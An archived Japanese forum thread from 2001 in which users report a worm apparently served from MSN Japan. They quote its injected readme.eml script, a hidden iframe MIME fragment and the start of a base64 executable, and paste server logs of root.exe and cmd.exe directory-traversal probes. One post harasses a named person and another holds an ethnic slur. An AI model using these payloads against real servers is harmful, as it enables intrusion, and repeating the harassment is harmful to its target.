1 :
うぃるす? :
01/09/18 23:19 ID:eDmIjNNM http://www.msn.co.jp 開くとreadme.exeというなんとも怪しさ全快のファイルがDLするようになってます。
ソースを見ると
最後の一行に
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script
だって。なんじゃこりゃ
2 :
:01/09/18 23:21 ID:G2aYU2QA
変なウィンドウ開くぞ。
3 :
:01/09/18 23:23 ID:kMmxFevA
漏れは開かないけど
4 :
:01/09/18 23:24 ID:yVFUnsO2
大丈夫でしたよ
5 :
´_ゝ` :01/09/18 23:25 ID:1DjpzcjQ
∧∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 、_ ( ゚д゚) < 怖くてurl踏めないよ。。。。 uuuu´ \_________________
6 :
ななし :01/09/18 23:27 ID:lOY94g26
┌──┐ │(゚д゚│ ├──┘ │ │
7 :
:01/09/18 23:30 ID:esACaLME
>このサイトは Microsoft Internet Explorer でご覧ください。 >Microsoft Internet Explorer をインストールしてください。 > >ここを クリック して Microsoft Internet Explorer をダウンロードしてください。 > >(C) 1997-2000 Microsoft Corporation. All rights reserved. Terms of Use. Privacy Policy.
( ´Д`)y──┛~~なんじゃこりゃー <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAKh+PwEAAAB/UEUAAEwBBQB1Oqc7 AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA AAAABAAAAAAAAAAAEAEAABA
9 :
:01/09/18 23:31 ID:5a8ti/6U
踏んだけど開いてくれねえ
10 :
:01/09/18 23:31 ID:yVFUnsO2
Donut 使ってたから大丈夫だったのかな
( ´Д`)y──┛~~ネスケだけど開いたよ、IMEのツールバーのトコに
12 :
:01/09/18 23:33 ID:hCPT0f/E
VSが立ち上がるんだけどどうなってんのこれ?
13 :
:01/09/18 23:35 ID:GxdTIeAI
あちこちで叩かれまくってる田口乱Dの祟り
14 :
:01/09/18 23:36 ID:rk5ASkss
げ!なんだよ・・・これ・・・(;´Д`)
はきーんぐ!はきーんぐ!!!!!!!!!!!!!!!!
16 :
:01/09/18 23:37 ID:IqB1ARj.
これ、ダウンロードしていいんか?
17 :
:01/09/18 23:39 ID:.FWoJ1cI
おいらが見てるMSNには何もないよ? ソース見たけど。。。
18 :
:01/09/18 23:41 ID:yVFUnsO2
IEで開いたけどなんともならない... バージョンは 6.00.2462.0000 です どーして
19 :
@ :01/09/18 23:43 ID:vc5X8I2g
おいらのIEバージョン5です。WIN2000。 思いっきり開いてくれます
20 :
1 :01/09/18 23:44 ID:vc5X8I2g
21 :
:01/09/18 23:45 ID:Y6Bq0dos
DLしてウイルススキャンしたが問題なし。 けど、恐くて実行できない
22 :
:01/09/18 23:46 ID:5a8ti/6U
バグブラじゃ開いてくれねえ
23 :
:01/09/18 23:47 ID:HURnrsPc
怖いなぁ
24 :
報告 :01/09/18 23:47 ID:yVFUnsO2
25 :
:01/09/18 23:47 ID:ffH7qlyM
何もないよ。
26 :
:01/09/18 23:48 ID:54cIxK/I
開くよ?なんもDLするような気配無しだけど・・・ なおっちゃった?
27 :
:01/09/18 23:49 ID:5gTXV3Iw
げ、、ダウソしてしまったyo
28 :
:01/09/18 23:49 ID:Y6Bq0dos
29 :
:01/09/18 23:49 ID:ffH7qlyM
indexファイルってことね。 この部分ね。 <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
30 :
マカ :01/09/18 23:49 ID:6GQkZri2
マカにはかんけーねー話だ
31 :
:01/09/18 23:50 ID:.FWoJ1cI
>>20 なるほど、リダイレクト用ページのソースにあるということですね。
たしかに、おっしゃるとおりのスクリプト、確認いたしました。
※確認法、下記のURLで右クリック>対象をファイルに保存
そして、保存されたファイルをテキストエディタでご閲覧ください。
http://www.msn.co.jp しかし、Win2000+IE6.00.2462.0000におきまして、当方の環境では
なにも変化なくhomeへリダイレクトされます。
33 :
:01/09/18 23:52 ID:ffH7qlyM
そのファイルをテキストで開くとこの部分だけ読める。 This program cannot be run in DOS mode. ちなみにウィルスバスター2001/09/15版ではウィルスチェックは大丈夫だね。
35 :
:01/09/18 23:55 ID:ayXX6Jzg
普通のMSNだけど・・?
36 :
:01/09/18 23:55 ID:ffH7qlyM
>>34 更新したけど大丈夫だった。
これ以上判らん。(;´Д`)
37 :
:01/09/18 23:56 ID:Y6Bq0dos
つか、実行したらexplorer.exeが強制終了した 吃驚したよ
38 :
:01/09/18 23:58 ID:MOOg4l2k
ページまっしろ。 何も起こらん
39 :
うわ!!! :01/09/18 23:59 ID:XewLJqYc
マックOSが立ちあがった!
40 :
:01/09/18 23:59 ID:IqB1ARj.
41 :
:01/09/18 23:59 ID:L8dTlbxU
普通すぎる 踏みてぇぇ〜〜〜〜
42 :
:01/09/18 23:59 ID:ffH7qlyM
43 :
ん〜ま :01/09/19 00:00 ID:TWLvHZ.k
デコードしてみました。ウイルスですね。 最新のスキャンにも引っかからないので新種ですね。
( ´Д`)y──┛~~IEだと↓
<HTML><HEAD></HEAD><BODY bgColor=#ffffff>
<iframe src=cid:EA4DMGBP9p height=0 width=0>
</iframe></BODY></HTML>
ネスケだと(4.73)
>>8
45 :
:01/09/19 00:01 ID:rkXvUCbU
46 :
:01/09/19 00:02 ID:4WX8sZyQ
アップデートできないんだが・・・。
47 :
てことは… :01/09/19 00:02 ID:2tV4oiIM
MSNはきーんぐ?
49 :
_ :01/09/19 00:03 ID:r.8d659M
URL踏んだけど・・・普通のページだ。 何も起こらない場合は、大丈夫なんだよね? 勝手にDLって事はないんだよね?
50 :
ページが真っ白 :01/09/19 00:03 ID:CpVmg70M
何も起こらないんですけど…
51 :
は :01/09/19 00:04 ID:ntSrYJp6
最初真っ白だったけど Proxomitron バイパスさせたら普通になった
52 :
:01/09/19 00:04 ID:rkXvUCbU
>>49 意図的に開かないとDLはしないんじゃないかな??
53 :
:01/09/19 00:04 ID:1QJIZcaI
54 :
:01/09/19 00:05 ID:P2Rw92t6
おいおい、マジデウイルスなの? つか、3Dcidでgoogleすると、おんなじようなメールのログばっか引っかかる。 なんなの、これ。
55 :
:01/09/19 00:05 ID:2tV4oiIM
IEのバージョンが5だとDLされるみたいです(?)
56 :
_ :01/09/19 00:07 ID:r.8d659M
57 :
:01/09/19 00:07 ID:sU9otsnY
58 :
ん〜ま :01/09/19 00:08 ID:TWLvHZ.k
ネタじゃ無いです。 57344バイトのバイナリが生成されます。 バイナリの中に送られて来た時のヘッダが入ってるので明らかにウイルスです。 まあ何日かあとにウソかどうか判るでしょう。
59 :
:01/09/19 00:08 ID:rkXvUCbU
>>55 そうなの?そう言えばおいらのは5.50だな。
うーん、他のPCもIE5.50だな。確認するの面倒。ヽ(´ー`)ノ
60 :
:01/09/19 00:09 ID:1QJIZcaI
どのIEでも実行されないだろ。 2つ目の<HTML>タグが実行される事ってあるのか?
61 :
:01/09/19 00:09 ID:sOHOi1PM
test
62 :
:01/09/19 00:10 ID:XTAHDm5.
っつーか、MSN何も表示されないんだが。
63 :
踏めない人 :01/09/19 00:10 ID:2tV4oiIM
64 :
:01/09/19 00:10 ID:P2Rw92t6
しかしあれだな、平時だったら確実に祭り級のネタなのにね。
>>58 ( ´Д`)y──┛~~これのコト?↓
Content-ID: <EA4DMGBP9p>
66 :
´_ゝ` :01/09/19 00:11 ID:FjGG5kz2
/⌒\ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( ・人・ ) < IE5.50だから関係無いなぁ。で、いつかなの? | | | \__________ (__)_)
67 :
:01/09/19 00:12 ID:sf/A3N6g
( ´Д`)y──┛~~5.01だよ・・・・・・。(鬱
69 :
ん〜ま :01/09/19 00:12 ID:TWLvHZ.k
3Dcid〜はアウトルックがバイナリをHTMLメールに添付する時のヘッダ(らしい)。 良く知らぬが。
70 :
;´Д` :01/09/19 00:13 ID:N4U8iOCw
IE6だが、そのまま表示されたからセーフだよな?
71 :
:01/09/19 00:13 ID:XTAHDm5.
あ、出た。 でも、IE5.50だから何もおきない。
72 :
:01/09/19 00:14 ID:1QJIZcaI
73 :
ん〜ま :01/09/19 00:14 ID:TWLvHZ.k
とりあえずセキュ板に報告するか。 最近apacheに変なリクエストが来ると思ったらこいつか〜 MSNを陥れるとはCodeRedを超えたか?w
74 :
:01/09/19 00:14 ID:rkXvUCbU
75 :
ななし :01/09/19 00:14 ID:/eNoyk0A
今見たが・・・ネタか?これはウイルスじゃありません。。。 MSNがかってにやってるだけ。好きにしてください しゅうりょ〜
76 :
:01/09/19 00:14 ID:2tV4oiIM
IE5.5以降は二つ目の<html>が実行されない仕様になっているのだろうか?
77 :
:01/09/19 00:15 ID:P2Rw92t6
>>75 たのむ、終了前にマジレスで本トのところを教えてくださいませ。
78 :
:01/09/19 00:16 ID:DI6y22gQ
79 :
:01/09/19 00:16 ID:1QJIZcaI
>>76 つーか、普通のブラウザは2つ目の<HTML>は無視するだろう。
80 :
ん〜ま :01/09/19 00:17 ID:TWLvHZ.k
最後に↓が付いてますな。MSNに知らせてあげな。 ワシはもう寝る。 </HTML> <html><script language="JavaScript"> window.open("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>
81 :
:01/09/19 00:19 ID:2tV4oiIM
仮にはきーんぐしたとしたら、 なぜこんな風二つ目の<HTML>タグを使った書きかたすんのかな?
( ´Д`)y──┛~~てか、Code Biueて何よ?
83 :
:01/09/19 00:21 ID:DI6y22gQ
84 :
:01/09/19 00:21 ID:/2jqCzJs
85 :
:01/09/19 00:22 ID:r9s9HHXs
俺だけか?
>>63 のURLを踏むとメディアプレーヤーが立ち上がる
86 :
:01/09/19 00:23 ID:P2Rw92t6
>>85 ↓かのファイルの一部
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
audio/x-wav に反応してるようですね。
MIMEのデコードが上手くいかない(;´Д`) readme.exeのみのヘッダ教えてチョ
88 :
あ :01/09/19 00:23 ID:il9ZOLGw
なんかタスクバーにクリックしても開かないウィンドウがあったので、 MSNのサイトと一緒に無理やり閉じましたけど…。 見ただけじゃ感染とかしませんよね?
>>85 ( ´Д`)y──┛~~Content-Type: audio/x-wav; が関係あるんじゃ?
てか、セキュ板の解説っつーか、翻訳してくれ。ワケワカラン・・・
90 :
:01/09/19 00:24 ID:VS20bCU.
91 :
ん〜ま :01/09/19 00:24 ID:TWLvHZ.k
>>81 ウイルスがやってるだけ。追加カキコの方が楽だから。
<html>
本文
</html>
<html>
ウイルス本文
</html>
92 :
:01/09/19 00:25 ID:v95xLxH.
>>85 Content-Type: audio/x-wav;
name="readme.exe"だと。
93 :
:01/09/19 00:25 ID:P2Rw92t6
と、いうわけでとりあえずは証拠保全命令ですね。 保管してます.....
94 :
:01/09/19 00:25 ID:EqvGQ44A
95 :
* :01/09/19 00:25 ID:HpUawTko
MSNのチャットで複数の名前で自作自演をしていた鉄ヲタ、ゲートウェイ。
個人売買での支払い踏み倒しやネカマ行為、荒らし行為を繰り返して逃走、
さらにはオフ会すっぽかしなど数々の伝説を持つヒッキーです。
・ベンチャービジネスで一儲けした
・愛車はホンダのNSX2台(あわせて2000万円)
・結婚しました。お祝いよろしく♪
などと嘘で身を固めていたものの、実のところはデブの鉄ヲタ専門学生ということが判明。
現在は「COW(カウ)」と名を変えて害悪巣に潜伏しています。
ちなみに壁紙は深キョンの画像貼りまくり....
http://withu.gaiax.com/home/cow66
96 :
:01/09/19 00:26 ID:XTAHDm5.
とりあえずウィルススキャンしても、何も無かったが・・・
97 :
やべ! :01/09/19 00:26 ID:Lwmdm1LU
メリッサと出たが
98 :
37 :01/09/19 00:27 ID:NRln1zEY
なーんだIIS入れてなかったからexplorerが落ちただけで済んだのか。
99 :
:01/09/19 00:28 ID:1QJIZcaI
とりあえず、MSNに質問メール投げてみた。
100 :
85 :01/09/19 00:28 ID:.FNeXM3I
>>86 いきなり立ち上がったからグロ動画とかでも出てくるのかと思って
速攻で消したんだけど、ただ立ち上がるだけなの?
101 :
:01/09/19 00:30 ID:eiodJYMI
102 :
ばりむか :01/09/19 00:30 ID:DaGiF8qc
103 :
:01/09/19 00:31 ID:nvjte6gM
おかしい?
readme.exeをテキストエディタで開いてみろ! レジストリのパスらしき文字列がある! ↓ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0 また中国人かよ・・・
105 :
:01/09/19 00:32 ID:XTAHDm5.
2000の方がIE5.01だったようで、MSN逝ったらメディアプレイヤーが開いた。 ・・・とりあえずアップデートしとくか・・・
106 :
:01/09/19 00:33 ID:8oVJNRd2
107 :
初心者 :01/09/19 00:33 ID:CpVmg70M
何も起こらないんですが… 皆さん、何を、どうやってるんですか?
108 :
:01/09/19 00:33 ID:2tV4oiIM
そろそろ結論がでそうですな… MSNの厨房スタッフがCodeRED(BLUE?)を実行、 ウィルス感染しているという状態ですか。
109 :
これは、もしかして・・・ :01/09/19 00:33 ID:1QJIZcaI
祭りか?
110 :
:01/09/19 00:34 ID:2tV4oiIM
111 :
:01/09/19 00:34 ID:XSvfmhVk
チャンコロは氏ね
112 :
:01/09/19 00:34 ID:8oVJNRd2
( ´Д`)y──┛~~Code RedってNTとか2Kだっけ?感染するの?
114 :
:01/09/19 00:35 ID:8oVJNRd2
115 :
:01/09/19 00:35 ID:1QJIZcaI
( ´Д`)y──┛~~95だから関係ないか・・・・・ヨカッタ(ホッ
117 :
:01/09/19 00:37 ID:1QJIZcaI
118 :
:01/09/19 00:37 ID:8oVJNRd2
CodeRedってdefault.idaを叩いて感染だよね?
119 :
:01/09/19 00:38 ID:xvhLpbxY
M$さいこー
120 :
:01/09/19 00:38 ID:DI6y22gQ
うちにきた第1号 210.118.236.231 - - [18/Sep/2001:22:26:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 397 "-" "-" 以下延々と同様のログが続く・・・
121 :
_ :01/09/19 00:38 ID:r.8d659M
98はどうなの? code redは98関係なかったみたいだけど・・・ 今回のは??
122 :
:01/09/19 00:38 ID:l3W.pccI
どっかの保険会社がIIS使ってるNTServerだけ保険料値上げしたらしいが 納得であるな。未だにIIS使ってる糞あどみんは逝ってよし! しかしMSNって日本でYAHOOに続いてアクセス多いんじゃないか? わけわからん初心者がまた多く感染しちゃうんだろうなぁ。
123 :
107 :01/09/19 00:38 ID:CpVmg70M
>>110 私、50でカキコしたものなんですが…
msn逝っても、何にもならないんです。いつものページなんですけど。
124 :
:01/09/19 00:38 ID:g0s0z5vI
情報認識不足
125 :
:01/09/19 00:39 ID:8oVJNRd2
>>120 CodeRedじゃないじゃん…。
新種か?
126 :
:01/09/19 00:39 ID:XgWFSkd.
127 :
:01/09/19 00:40 ID:3VqD98MQ
ラディンのサイバーテロ
128 :
:01/09/19 00:40 ID:KLLLh/gg
突然*.emlファイルが数千作成され、エクスプローラー開くと空き要領が5MB/secくらいの スピードで減っていった。LANでつないでいるリブレットも同時進行(^^;
129 :
:01/09/19 00:41 ID:8oVJNRd2
130 :
:01/09/19 00:41 ID:g0s0z5vI
>>123 IEのセキュリティを全部無効にしてから
逝ってみそ
131 :
確認法 :01/09/19 00:42 ID:P2Rw92t6
132 :
:01/09/19 00:42 ID:l3W.pccI
>>128 大丈夫?LANも同時進行って、イントラネットで一人感染したら全員に
行き渡る可能性もある?
133 :
:01/09/19 00:43 ID:DI6y22gQ
134 :
:01/09/19 00:43 ID:8oVJNRd2
>>128 とりあえず詳細きぼーん。
セキュリティ板とかの知識ある人呼べるかな?
135 :
る :01/09/19 00:43 ID:SkbmYgNc
なんでもなかったぞ? ウイルスバスターって、入れてるんだけど、、開くのは開いちゃうの?
136 :
:01/09/19 00:44 ID:EqvGQ44A
readme.exe実行しちゃった。 どうなるの?
137 :
:01/09/19 00:44 ID:XgWFSkd.
138 :
:01/09/19 00:45 ID:1QJIZcaI
ウィルスの確立90%以上と見た。 しかも、新種。 パターンファイル更新しても検出出来んもんな〜。 どんな悪さするかわからんから、素人は手を出しちゃ ダメだよ。 2〜3日後には大騒ぎかもしれん。 って、その頃は戦争始まっているからそれどころじゃないか・・。
139 :
:01/09/19 00:45 ID:8oVJNRd2
140 :
:01/09/19 00:45 ID:rkXvUCbU
実行はしてないけど・・・・問題はあるのかな?(;´Д`)
141 :
ん〜ま :01/09/19 00:46 ID:TWLvHZ.k
142 :
_ :01/09/19 00:46 ID:r.8d659M
コレもテロなのかい?
143 :
:01/09/19 00:46 ID:1QJIZcaI
>>137 メモ帳等で開くと、プログラムの中のメッセージとかが見れるんだよ。
でも、間違って実行しないようにしないと・・・。
144 :
128 :01/09/19 00:47 ID:KLLLh/gg
145 :
:01/09/19 00:47 ID:rkXvUCbU
23:50現在、6,7箇所からアクセスがありました。 かなりの勢いで広まっている可能性がありますので、IISの方は注意された方が いいかもしれません。
146 :
:01/09/19 00:47 ID:2tV4oiIM
対策されたみたいです。もう開きませんね
147 :
:01/09/19 00:47 ID:PavrK9zU
昨日バックアップとったばっかりだ・・・ホッ
( ´Д`)y──┛~~95には感染しないことを願う・・・・。 ダッテ リカバリーノCDROMモッテナイシ
149 :
:01/09/19 00:47 ID:XgWFSkd.
150 :
:01/09/19 00:48 ID:8oVJNRd2
151 :
:01/09/19 00:48 ID:qABiaKq.
え、今行こうと思ってたのに。閉鎖?
152 :
:01/09/19 00:48 ID:l3W.pccI
うぅ、明日学校のアクセスログ見るの楽しみだ(藁
153 :
p :01/09/19 00:48 ID:se4vaVZI
10:30頃、MSN行った後、画面が真っ白になって 急に動かなくなったんですけど、これってやばいんですか? その後も動きが鈍くなり、何回も強制終了したんですけど。 ど素人なもんで。心配です。
154 :
:01/09/19 00:49 ID:Gpvomf.g
うわ! サーバのログ見たらガンガン送ってきてるよ
155 :
:01/09/19 00:49 ID:gzbyfssc
てかMSN Messenger Servisてのが起動毎にシステムトレイに陣取ってんだけど どうにかなんない?
156 :
128 :01/09/19 00:49 ID:KLLLh/gg
ちなみに、msn.or.jp見に行っただけで勝手にダウンロードされた。まぁ、 遊び用のPCだからいいものの、仕事でもつかうPCなら用心されたし。
157 :
:01/09/19 00:49 ID:g0s0z5vI
</HTML> <html><script language="JavaScript"> window.open("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html> 消えたね
158 :
:01/09/19 00:50 ID:jWTibOpk
159 :
:01/09/19 00:50 ID:PavrK9zU
160 :
:01/09/19 00:50 ID:qABiaKq.
MSNほどのデカブツにウィルスなんてマジでテロか?
161 :
:01/09/19 00:50 ID:1QJIZcaI
>>153 変種か新種のウィルスの可能性が高いので、どんな事を行うかは不明・・・。
必要なファイルをFD等に保管しておいた方が良いと思われ。
162 :
:01/09/19 00:50 ID:xl/0vm/6
ノートンアンチウィルスを入れてるけど、何も警告サインは出なかったよ。 一応、ウィルススキャンをしておくかな。
163 :
107 :01/09/19 00:51 ID:CpVmg70M
164 :
:01/09/19 00:51 ID:l3W.pccI
apacheは大丈夫だよね?ちょっと不安だったり。
165 :
:01/09/19 00:51 ID:rkXvUCbU
>不用意に見に行くと、見に行っただけで自動的に「readme.exe」が実行されて >しまうおそれがある…かもしれないので注意が必要かと。 不用意に見に行った。(;´Д`)
166 :
:01/09/19 00:51 ID:sf/A3N6g
>>155 Serviceな。msconfigでスタートアップからはずす。
167 :
:01/09/19 00:52 ID:SkbmYgNc
で、どおなんの? ホームがMSNだったから、たぶん幾度となく被爆してるとおもうんだけど、、 そーいえば、最近、とても接続が悪いし、ダウンロードもうまくいかない。 ウイルスのせいか?
168 :
:01/09/19 00:52 ID:XSvfmhVk
日本を狙い撃ちですか?
169 :
:01/09/19 00:52 ID:8oVJNRd2
>>153 emlファイル探せ。
大量にあったら感染なので今日のところは電源落とせ。
明日になればtrendmicroなんかで対処できるだろうから。
170 :
ん〜ま :01/09/19 00:52 ID:TWLvHZ.k
171 :
:01/09/19 00:53 ID:8oVJNRd2
172 :
:01/09/19 00:53 ID:qABiaKq.
173 :
こんな感じ :01/09/19 00:54 ID:Gpvomf.g
61.207.x.x - - [19/Sep/2001:00:57:42 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.1" 404 257 61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.1" 404 255 61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 265 61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 265 61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218 61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218 61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218 61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 400 209 61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 400 209 61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /sc?/c+dir HTTP/1.1" 404 218 61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 209 61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 209 61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 218 61.207.x.x - - [19/Sep/2001:00:57:46 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
174 :
:01/09/19 00:54 ID:Qb3w7wGo
3回も見にいったが・・・ 全部開かないか、バグブラウザのエラーで止まるか、どちらか 今のところ何も異常なし DLはされなかったようだ
175 :
ん〜ま :01/09/19 00:54 ID:TWLvHZ.k
うちはIE4.0&ネスケなので助かった。
176 :
:01/09/19 00:55 ID:xvhLpbxY
>>160 MSが好きで食らってんだからいいんだよ。
177 :
:01/09/19 00:55 ID:l3W.pccI
178 :
:01/09/19 00:56 ID:qABiaKq.
179 :
:01/09/19 00:56 ID:M.gDjrRI
いつからだったんよ? 昨日はなんでもなかったの?
180 :
160 :01/09/19 00:56 ID:qABiaKq.
181 :
:01/09/19 00:57 ID:9UsydFnY
なかなか面白いね。 Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0 こんな文字列入ってるし MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe \\ octet これはなんだろ。リッチやexplorerのがいしゅつの手法かな?
182 :
:01/09/19 00:57 ID:Gpvomf.g
>>177 さっき書いたのプラス2行で1度に16種類のパケットが送られてくる
183 :
:01/09/19 00:58 ID:1QJIZcaI
>>179 うちのサーバのログからだと、昨日は何とも無い。
今日から、
>>173 と同様なログが記録されている。
184 :
p :01/09/19 00:58 ID:se4vaVZI
>>161 ,169
ありがとう!emlファイルって何だろう。すみません…。
185 :
:01/09/19 00:58 ID:8oVJNRd2
>>179 今晩10時前後から。
すごい勢いで広まってるっぽい。
186 :
_ :01/09/19 00:59 ID:T.W/lyRg
187 :
:01/09/19 00:59 ID:8oVJNRd2
>>184 スタートメニューから「ファイルの検索」で「*.eml」を検索。
188 :
ん〜ま :01/09/19 00:59 ID:TWLvHZ.k
>>185 げ!ほんとだ。。手当たり次第にページ開けてみたら当たった(^^;
あーあ。こりゃ明日は酷い事になるぞ。。
189 :
:01/09/19 01:00 ID:M.gDjrRI
190 :
>< :01/09/19 01:00 ID:GmvEeRHo
とりあえず、実行してみました。><
191 :
:01/09/19 01:01 ID:P2Rw92t6
とりあえず、明日は大変な日になりそうですなぁ>MS
192 :
:01/09/19 01:02 ID:2tV4oiIM
>>186 つーか、これはクラックなのか?専門家の意見きぼん
193 :
:01/09/19 01:02 ID:l3W.pccI
なんかさっきからZoneAlarmが頻繁に検知し始めたんだけど、関係あるかな?
194 :
ん〜ま :01/09/19 01:02 ID:TWLvHZ.k
とりあえず、半角板に貼っておけw
195 :
:01/09/19 01:03 ID:8oVJNRd2
>>193 叩かれてるね。
Win98なら問題ないし、普通ならNTや2000でも問題ない。
WEBサーバをIISで立ててる場合だけみたい。
196 :
:01/09/19 01:03 ID:PavrK9zU
当方IE5.00 TemporaryInternetのフォルダにreadme.emlが・・・・ 悪さはしてない”みたい”だが・・・
197 :
:01/09/19 01:04 ID:xvhLpbxY
とりあえずWINバンにも立てといた
198 :
:01/09/19 01:04 ID:1QJIZcaI
専門家じゃないが、新種のワームの可能性が極大だと思われ。
199 :
´_ゝ` :01/09/19 01:04 ID:FjGG5kz2
∫ ∧,,∧ ∬ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ミ,,゚Д゚ノ,っ━~ < いやー、msnに逝ってなくてよかったよ。 _と~,,, ~,,,ノ_. ∀ \_________ .ミ,,,/~), .| ┷┳━  ̄ ̄ ̄ .し'J ̄ ̄|... ┃  ̄ ̄ ̄ ̄ ̄ ̄ ̄ .┻
200 :
おお :01/09/19 01:04 ID:g2l9o4Zk
>>183 [18/Sep/2001:23:55:53 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
以下15行つづく
うちのとこもきてたよ!
201 :
:01/09/19 01:04 ID:8oVJNRd2
>>196 readme.exeを実行しなければ大丈夫。
readme.emlはexeをダウンロードさせるためのスクリプトだかHTMLだか。
202 :
:01/09/19 01:04 ID:N4U8iOCw
ん?emlってエミュファイルですか? 実行していいんですよね?
203 :
:01/09/19 01:05 ID:qABiaKq.
204 :
ん〜ま :01/09/19 01:05 ID:TWLvHZ.k
新種でしょうね。続きはセキュ板でどうぞ。 #あっちだと初心者は相手にされないかもー
205 :
:01/09/19 01:05 ID:qABiaKq.
とにかく触らぬウィルスに祟りなし
206 :
´_ゝ` :01/09/19 01:06 ID:FjGG5kz2
∧∧
>>193 (=゚ω゚)ノ オイラのところにもガンガンやってきてるょぅ
〜( x)
U U
207 :
:01/09/19 01:06 ID:1QJIZcaI
自分が感染していないだけで安心しちゃいかんよ。 ここ数時間、CodeRed以上のトラフィックかけまくっている ようだから、インターネットに大きな影響が出る可能性が あると思われ。
208 :
:01/09/19 01:07 ID:l3W.pccI
>叩かれてるね。 >Win98なら問題ないし、普通ならNTや2000でも問題ない。 >WEBサーバをIISで立ててる場合だけみたい。 ありがとうございます。つまち.emlファイルが大量に作成されるのは 普通のuserにはありえないということですか?それとも感染はするが よそ様に迷惑はかけないということですか?
209 :
( ゚д゚)ゴルァ! :01/09/19 01:07 ID:YyzGBUQc
>>202 辺見エミリファイルです( ゚д゚) テルヒコッ!
210 :
ん〜ま :01/09/19 01:07 ID:TWLvHZ.k
211 :
:01/09/19 01:08 ID:5UOZbq.6
おいおい!!メールチェックしたらどっさり変なもんが!!!
212 :
:01/09/19 01:09 ID:rkXvUCbU
>>211 どんなの?って落とせないか?(;´Д`)
213 :
:01/09/19 01:09 ID:1QJIZcaI
.emlファイルを甘く見ちゃダメよ。 ウィルスが一緒にエンコードされている可能性あるから。 試したいなら、OutlookExpressに放り込んで見るとわかるYO!
214 :
:01/09/19 01:10 ID:SkbmYgNc
新着メッセージなし。。。 これは、これで、悲しい。
215 :
:01/09/19 01:11 ID:yiqzO60A
216 :
ん〜ま :01/09/19 01:11 ID:TWLvHZ.k
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China だそうです。新作ですね。
217 :
:01/09/19 01:12 ID:qABiaKq.
218 :
_ :01/09/19 01:12 ID:r.8d659M
.emlってファイルが幾つかあるんだけど・・・ やばいのかな??? スタート→ファイルの検索で。 mpeg系ファイルに多く見られるんだけど・・・。 だれか、マジレスお願いします!!
219 :
:01/09/19 01:13 ID:sf/A3N6g
220 :
:01/09/19 01:13 ID:rkXvUCbU
221 :
これで安心? :01/09/19 01:13 ID:N4U8iOCw
漏れのHDDには*.emlファイルなんて無かったYO!
222 :
:01/09/19 01:13 ID:PavrK9zU
漏れも新着無し。 メル来ないどうしでメル友になるか?(藁
223 :
:01/09/19 01:13 ID:s/F3aidE
で、MSN側からのアナウンスはまだないの?
224 :
つーか :01/09/19 01:13 ID:1QJIZcaI
>>216 その文字列は激しくガイシュツ。
問題はその中身。。
225 :
:01/09/19 01:14 ID:630yIQG.
メールか… 14日から1通も来てないな…
226 :
